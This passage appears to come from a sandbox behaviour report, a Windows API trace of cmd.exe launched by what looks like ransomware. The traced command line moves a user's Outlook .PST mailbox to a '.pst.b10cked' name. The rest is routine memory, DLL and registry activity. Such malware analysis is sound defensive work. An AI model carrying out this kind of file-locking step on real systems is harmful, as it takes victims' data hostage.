"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35850 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35851 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35852 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35853 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 35854 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35855 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35856 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35857 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35858 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" 
Region: id = 35859 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35880 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35881 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35882 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35883 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 35884 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 35885 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35886 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35887 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35888 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35889 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35890 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35891 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35892 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35893 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35894 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 35895 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35896 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35897 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35898 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35899 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000000e0000" filename = "" Region: id = 35900 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35901 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35902 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 35903 start_va = 0x1110000 end_va = 0x1272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Thread: id = 893 os_tid = 0x170 [0237.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30faec | out: lpSystemTimeAsFileTime=0x30faec*(dwLowDateTime=0xc0f6f600, dwHighDateTime=0x1d440a9)) [0237.403] GetCurrentProcessId () returned 0xa70 [0237.403] GetCurrentThreadId () returned 0x170 [0237.403] GetTickCount () returned 0x411da [0237.403] QueryPerformanceCounter (in: lpPerformanceCount=0x30fae4 | out: lpPerformanceCount=0x30fae4*=29419243510) returned 1 [0237.404] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000 [0237.404] __set_app_type (_Type=0x1) [0237.404] __p__fmode () returned 0x76b331f4 [0237.404] __p__commode () returned 0x76b331fc [0237.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0 [0237.404] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0 [0237.404] GetCurrentThreadId () returned 0x170 [0237.404] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x170) returned 0x38 [0237.404] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0237.404] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0237.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.405] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0237.405] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa7c | out: phkResult=0x30fa7c*=0x0) returned 0x2 [0237.405] VirtualQuery (in: lpAddress=0x30fab3, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0237.405] GetConsoleOutputCP () returned 0x1b5 [0237.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.405] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1 [0237.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0237.405] _get_osfhandle (_FileHandle=1) returned 
0x7 [0237.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.406] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.406] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0237.406] GetEnvironmentStringsW () returned 0x1101a8* [0237.406] FreeEnvironmentStringsW (penv=0x1101a8) returned 1 [0237.406] GetEnvironmentStringsW () returned 0x1101a8* [0237.406] FreeEnvironmentStringsW (penv=0x1101a8) returned 1 [0237.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9ec | out: phkResult=0x30e9ec*=0x40) returned 0x0 [0237.406] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0xd0, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.406] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.406] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x0, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegCloseKey (hKey=0x40) returned 0x0 [0237.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9ec | out: phkResult=0x30e9ec*=0x40) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x0, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, 
lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x9, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x9, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x9, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegCloseKey (hKey=0x40) returned 0x0 [0237.407] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c5 [0237.407] srand (_Seed=0x5b8863c5) [0237.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"" [0237.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"" [0237.407] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.408] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x111908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0237.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0237.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0237.408] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, 
nSize=0x2000 | out: lpBuffer="") returned 0x0 [0237.408] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0237.408] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0237.408] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0237.408] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0237.408] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0237.408] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0237.408] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0237.408] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0237.408] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0237.408] GetEnvironmentStringsW () returned 0x1122f8* [0237.408] FreeEnvironmentStringsW (penv=0x1122f8) returned 1 [0237.408] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.408] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0237.408] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0237.408] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0237.408] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0237.408] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0237.408] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0237.408] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0237.408] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0237.408] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0237.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f7b8, lpFilePart=0x30f7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x30f7b4*="Desktop") returned 0x18 [0237.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0237.409] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f534 | out: lpFindFileData=0x30f534) returned 0x110038 [0237.409] FindClose (in: hFindFile=0x110038 | out: hFindFile=0x110038) returned 1 [0237.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f534 | out: lpFindFileData=0x30f534) returned 0x110038 [0237.409] FindClose (in: hFindFile=0x110038 | out: hFindFile=0x110038) returned 1 [0237.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f534 | out: lpFindFileData=0x30f534) returned 0x110038 [0237.409] FindClose (in: hFindFile=0x110038 | out: hFindFile=0x110038) returned 1 [0237.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0237.409] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0237.409] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0237.409] GetEnvironmentStringsW () returned 0x112b18* [0237.410] FreeEnvironmentStringsW (penv=0x112b18) returned 1 [0237.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.410] GetConsoleOutputCP () returned 0x1b5 [0237.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.410] GetUserDefaultLCID () returned 0x409 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f8f8, cchData=128 | out: lpLCData="0") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f8f8, cchData=128 | out: 
lpLCData="0") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f8f8, cchData=128 | out: lpLCData="1") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2 [0237.411] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0237.412] GetConsoleTitleW (in: lpConsoleTitle=0x1008f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0237.412] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0237.412] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0237.412] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0237.413] _wcsicmp 
(_String1="move", _String2=")") returned 68 [0237.413] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0237.413] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0237.413] _wcsicmp (_String1="IF", _String2="move") returned -4 [0237.413] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0237.413] _wcsicmp (_String1="REM", _String2="move") returned 5 [0237.413] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0237.416] GetConsoleTitleW (in: lpConsoleTitle=0x30f5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.416] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0237.416] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0237.416] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0237.416] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="CD") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="REN") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="SET") returned -6 [0237.416] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0237.416] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0237.416] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0237.416] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0237.416] _wcsicmp (_String1="move", _String2="MD") returned 11 [0237.416] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0237.416] _wcsicmp (_String1="move", _String2="RD") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0237.416] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0237.416] 
_wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0237.416] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0237.416] _wcsicmp (_String1="move", _String2="VER") returned -9 [0237.416] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0237.416] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0237.416] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0237.416] _wcsicmp (_String1="move", _String2="START") returned -6 [0237.417] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0237.417] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0237.417] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0237.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0237.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0237.418] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0237.418] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) 
